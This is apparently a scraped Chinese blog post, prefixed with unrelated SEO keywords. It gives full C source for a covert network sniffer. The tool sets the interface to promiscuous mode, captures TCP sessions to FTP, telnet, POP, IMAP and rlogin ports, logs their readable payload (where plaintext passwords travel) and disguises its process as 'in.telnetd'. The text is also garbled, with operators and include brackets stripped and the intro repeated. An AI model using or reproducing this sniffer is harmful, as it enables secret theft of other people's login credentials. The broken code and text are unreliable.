快速建站开源,大数据毕业后去什么岗位就业,南宁企业官网seo,北京红酒网站建设参考陈兵老师的《网络安全》一书 环境#xff1a;kali linuxgcc 6.xx 具体的实现原理是#xff0c;先将自己的网卡设置为混杂模式#xff0c;然后从特殊的套接字中读取以太网帧#xff0c;对读取的以太帧进行筛选、去报头。得到我们想要的数据。
#includestdio.hkali linuxgcc 6.xx 具体的实现原理是先将自己的网卡设置为混杂模式然后从特殊的套接字中读取以太网帧对读取的以太帧进行筛选、去报头。得到我们想要的数据。
#includestdio.h
#includestdlib.h
#includeunistd.h
#includestring.h
#includectype.h
#includenetdb.h
#includesys/file.h
#includesys/time.h
#includetime.h
#includesys/socket.h
#includesys/ioctl.h
#includesys/signal.h
#includenet/if.h
#includearpa/inet.h
#includenetinet/in.h
#includenetinet/ip.h
#includenetinet/tcp.h
#includenetinet/if_ether.h#define CAPLEN 512
#define TIMEOUT 30
#define TCPLOG tcp.logstruct etherpacket{struct ethhdr eth;//以太网帧的头部struct iphdr ip;//IP报头struct tcphdr tcp;//tcp报头char buff[8192];//数据
}ep;struct{unsigned long saddr;//源地址unsigned long daddr;//目标地址unsigned short sport;//源端口unsigned short dport;//目标端口int bytes_read;char active;//目标主机是否处于活跃状态time_t start_time;
}victim;struct iphdr *ip;
struct tcphdr *tcp;
int s;
FILE *fp;int openintf(char *);
void clear_victim(void);
void cleanup(int);
char *hostlookup(unsigned long int);
int print_header(void);
int read_tcp(int);int filter(void){//对读取的以太帧进行筛选int p0;if(ip-protocol!6)return 0;if(victim.active!0)if(victim.bytes_readCAPLEN){fprintf(fp,\n-- -- - [CAPLEN Exceeded]\n);clear_victim();return 0;}if(victim.active!0)if(time(NULL)(victim.start_timeTIMEOUT)){fprintf(fp,\n-- -- - [Time Out]\n);return 0;}int destntohs(tcp-dest);//ntohs(),将网络字节序转换为十进制字节序if(dest21||dest23||dest110||dest109||dest143||dest513||dest106)p1;if(victim.active0)if(p1)if(tcp-syn1){victim.saddrip-saddr;victim.daddrip-daddr;victim.active1;victim.sporttcp-source;victim.dporttcp-dest;victim.bytes_read0;victim.start_timetime(NULL);print_header();}if(tcp-dest!victim.dport)return 0;if(tcp-source!victim.sport)return 0;if(ip-saddr!victim.saddr)return 0;if(ip-daddr!victim.daddr)return 0;if(tcp-rst1){victim.active0;alarm(0);fprintf(fp,\n-- -- -[RST]\n);clear_victim();return 0;}if(tcp-fin1){victim.active0;alarm(0);fprintf(fp,\n-- -- - [FIN]\n);clear_victim();return 0;}return 1;
}int read_tcp(int a){int x;while(1){xread(s,(struct etherpacket*)ep,sizeof(ep));//read(),从目标文件中读取以太网帧if(x1){if(filter()0)continue;x-54;if(x1)continue;return x;}}
}int print_header(void){fprintf(fp,\n);fprintf(fp,%s,hostlookup(ip-saddr));fprintf(fp,%s[%d]\n,hostlookup(ip-daddr),ntohs(tcp-dest));
}int print_data(int datalen,char *data){int i0;int t0;victim.bytes_readdatalen;for(i0;i!datalen;i){if(data[i]13){fprintf(fp,\n);t0;}if(isprint(data[i])){fprintf(fp,%c,data[i]);t;}if(t75){t0;fprintf(fp,\n);}}
}char *hostlookup(unsigned long int in){static char blah[1024];struct in_addr i;struct hostent *he;i.s_addrin;hegethostbyaddr((char *)i,sizeof(struct in_addr),AF_INET);//获取IP对应目标主机的主机名if(heNULL)strcpy(blah,inet_ntoa(i));else strcpy(blah,he-h_name);return blah;
}void clear_victim(void){victim.saddr0;victim.daddr0;victim.sport0;victim.dport0;victim.active0;victim.bytes_read0;victim.start_time0;
}void cleanup(int sig){fprintf(fp,Exiting..\n);close(s);fclose(fp);exit(0);
}int openintf(char *d){int fd;struct ifreq ifr;int s;fdsocket(AF_INET,SOCK_PACKET,htons(0x800));//SOCK_PACKET用于获取以太网帧的套接字if(fd0){perror(cant get SOCK_PACKET);exit(0);}strcpy(ifr.ifr_name,d);sioctl(fd,SIOCGIFFLAGS,ifr);//I/O管道控制函数if(s0){close(fd);perror(cant get flags);exit(0);}ifr.ifr_flags|IFF_PROMISC;sioctl(fd,SIOCSIFFLAGS,ifr);if(s0)perror(cant set promiscuous mode);return fd;}int main(int argc,char *argv[]){sprintf(argv[0],%s,in.telnetd);sopenintf(eth0);ip(struct iphdr*)(((unsigned long)ep.ip)-2);tcp(struct tcphdr*)(((unsigned long)ep.tcp)-2);if(argc2)fpstdout;else fpfopen(TCPLOG,at);if(fpNULL){fprintf(stderr,cant open log\n);exit(0);}clear_victim();for(;;){read_tcp(s);if(victim.active!0)print_data(htons(ip-tot_len)-sizeof(ep.ip)-sizeof(ep.tcp),ep.buff-2);sleep(1);fflush(fp);}return 0;
}
